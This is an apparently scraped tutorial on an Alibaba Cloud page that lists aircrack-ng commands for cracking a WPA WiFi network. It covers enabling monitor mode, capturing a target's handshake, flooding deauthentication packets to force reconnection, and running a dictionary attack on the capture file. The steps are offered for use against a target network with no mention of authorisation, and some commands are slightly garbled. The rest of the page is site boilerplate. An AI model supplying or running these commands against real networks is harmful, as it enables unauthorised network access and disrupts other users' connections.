Kali Linux WiFi hack (aircrack)

Source: Internet
Author: User
Tags kali linux

Need a network card that can listen

Airmon-ng Start Wlan0 (monitoring network card)

Airmon-ng check Kill (to clear other affected environments)

Airodump-ng mon0 (scan nearby WiFi)

Airodump-ng--bssid target mac-c (target ch)-W Crack (custom file name) Mon0

Next, wait for the hand package.

Auxiliary acceleration:

Aireplay-ng--deaut 10 (10 time)-a target mac-c mac Mon0 (flood attack)

Aircrack-ng-w/tmp/wpadict.txt Crack-01.cap (Run dictionary, here's the. cap file is caught handshake packet, front is the dictionary)

The attack requires a device inside the WiFi and requires a powerful dictionary and GPU

Kali Linux WiFi hack (aircrack)

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.